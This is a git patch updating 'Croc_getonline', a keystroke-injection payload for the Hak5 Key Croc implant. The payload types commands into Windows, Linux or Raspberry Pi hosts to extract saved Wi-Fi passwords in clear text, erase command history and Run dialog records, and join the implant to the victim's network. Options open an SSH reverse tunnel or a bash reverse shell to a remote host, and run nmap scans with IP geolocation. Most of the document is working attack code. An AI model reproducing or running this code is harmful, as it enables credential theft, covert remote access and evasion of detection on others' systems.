From ec819336d7edb9139ac7cf24e558b70e363ad531 Mon Sep 17 00:00:00 2001 From: spywill Date: Wed, 19 Jul 2023 06:02:58 -0400 Subject: [PATCH] Update Croc_getonline.txt minor changes new options recon, ssh keycroc MATCH command perform specific tasks --- .../Croc_Getonline/Croc_getonline.txt | 412 ++++++++++++++---- 1 file changed, 329 insertions(+), 83 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 64009c0..64f18cf 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt @@ -1,118 +1,364 @@ # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point -# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt +# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 3.5 +# Version: 4.1 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro -MATCH (getonline_W|getonline_R|getonline_L) +# getonline_W <-- MATCH word for windows, Attempt connection to access point +# getonline_L <-- MATCH word for Linux, Attempt connection to access point +# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point +# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD ) +# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID +# getonline_K <-- MATCH word for killing keycroc wlan0 interface +# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE +# getonline_H <-- MATCH word for entering ATTACKMODE HID +# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL +# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET +# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot -CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) -for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done +MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) +QUACK LOCK -wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt +#---> Edit payload option below +option=0 +keycroc_password=hak5croc +wifi_pass=/tools/wifipass.txt -if [ -f $wifi_pass ]; then - cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt - rm -f $wifi_pass +#---> Edit remote host below +remote_user_name=EDIT_REMOTE_USERNAME_HERE +remote_host_ip=EDIT_REMOTE_HOST_IP_HERE +remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE +port=7000 + +#---> Edit known SSID and password below +known_ssid=EDIT_KNOWN_SSID_HERE +known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE + +#---> Edit recon scan on/off below +recon=off +recon_loot=/root/udisk/tools/Target_SSID.txt + +#---> Edit Linux target password below +if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) +else + target_password=ENTER_LINUX_PASSWORD_HERE fi -ATTACKMODE HID STORAGE -Q DELAY 5000 -LED ATTACK +recon_scan() { + if [ "$recon" = "on" ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi + elif [ "$recon" = "off" ]; then + : + else + : + fi +} + +ENTER_STORAGE() { + if [ -f ~/udisk$wifi_pass ]; then + cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt + rm -f ~/udisk$wifi_pass + fi + ATTACKMODE HID STORAGE + QUACK DELAY 5000 + LED ATTACK +} + +RESET_PAYLOAD() { + QUACK UNLOCK + sleep 5 ; LED OFF + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +CLEAN_UP() { + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "history -c ; rm -f ~/.bash_history" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi +} case $LOOT in getonline_W) - Q GUI r - Q DELAY 3000 - Q STRING "powershell -NoP -NonI -W Hidden" - Q ENTER - Q DELAY 5000 - Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" - Q ENTER - Q DELAY 3000 - Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" - Q ENTER - Q DELAY 2000 - Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" - Q ENTER - Q DELAY 2000 - Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" - Q ENTER - Q DELAY 5000 - Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK GUI r + QUACK DELAY 3000 + QUACK STRING "powershell -NoP -NonI -W Hidden" + QUACK ENTER + QUACK DELAY 5000 + QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" + QUACK ENTER + QUACK DELAY 3000 + QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\"" + QUACK ENTER + QUACK DELAY 5000 + recon_scan + CLEAN_UP + QUACK STRING "exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_R) - Q CONTROL-ALT-d - Q CONTROL-ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "umount \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_L) - if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then - PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$target_password" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "sudo umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID +;; + getonline_N) + LED B + sleep 2 + echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass +;; + getonline_F) + if [ -f ~/udisk$wifi_pass ]; then + LED B + sleep 2 else - PC_PW=LINUX + LED R + RESET_PAYLOAD fi - Q CONTROL-ALT-d - Q ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" - Q ENTER - Q DELAY 2000 - Q STRING "$PC_PW" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "sudo umount \$MOUNT_POINT ; exit" - Q ENTER +;; + getonline_K) + ifconfig wlan0 down + LED R + RESET_PAYLOAD +;; + getonline_S) + ATTACKMODE HID STORAGE + RESET_PAYLOAD +;; + getonline_H) + ATTACKMODE HID + RESET_PAYLOAD +;; + getonline_P) + ATTACKMODE HID SERIAL + RESET_PAYLOAD +;; + getonline_A) + ATTACKMODE HID AUTO_ETHERNET + RESET_PAYLOAD +;; + getonline_X) + LED R + rm -f /root/udisk/payloads/Croc_getonline.txt + rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt + rm -f $recon_loot root/udisk/config.txt + apt -y remove sshpass + reboot --force ;; esac - -ATTACKMODE HID sleep 3 -LED SETUP -kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) +word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w) +if [[ $word_count -eq 2 ]]; then + ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)" + matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')" + sleep 1 + if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then + LED SETUP + else + LED R + RESET_PAYLOAD + fi +else + LED R + RESET_PAYLOAD +fi + +kill -9 $(pidof wpa_supplicant) +kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then - sed -i '0,/./s/^.//' $wifi_pass - sed -i 's/\r//g' $wifi_pass + sed -i '0,/./s/^.//' ~/udisk$wifi_pass + sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass + sed -i 's/\r//g' ~/udisk$wifi_pass fi -sed -i 's/\( \)*/\1/g' $wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt -wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf +sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass +sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt +wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf + ifconfig wlan0 up -wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 +wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf +dhclient wlan0 sleep 3 systemctl restart ssh.service -[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R +if : >/dev/tcp/8.8.8.8/53; then + if [ $option -eq 0 ]; then + : + elif [ $option -eq 1 ]; then + case "$LOOT" in + getonline_W) + QUACK GUI m + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 5000 + ;; + getonline_R) + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + ;; + getonline_L) + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + ;; + esac + QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$keycroc_password" + QUACK ENTER + elif [ $option -eq 2 ]; then + status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" + if [ ! $? = 0 ] || [ ! "$status" = installed ]; then + apt -y install sshpass + else + : + fi + sleep 1 + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null + rm -rf ~/.ssh 2>/dev/null + ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 1 + ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip + else + LED R + sleep 1 + fi + elif [ $option -eq 3 ]; then + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + /bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 & + else + LED R + sleep 1 + fi + else + LED FINISH + fi + LED FINISH +else + LED R +fi + sleep 3 LED OFF +QUACK UNLOCK + +if [ "$recon" = "on" ]; then + LED C SLOW + echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot + ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass) + iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot + echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot + ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot + cat /etc/resolv.conf | grep nameserver >> $recon_loot + + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot + calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" + echo "$network_range" + } + perform_nmap_scan() { + local network_range=$1 + nmap -T4 -F $network_range >> $recon_loot + } + network_range=$(calculate_network_range) + perform_nmap_scan $network_range + + echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot + curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot + echo -ne "\n\n" >> $recon_loot + LED OFF +elif [ "$recon" = "off" ]; then + : +else + : +fi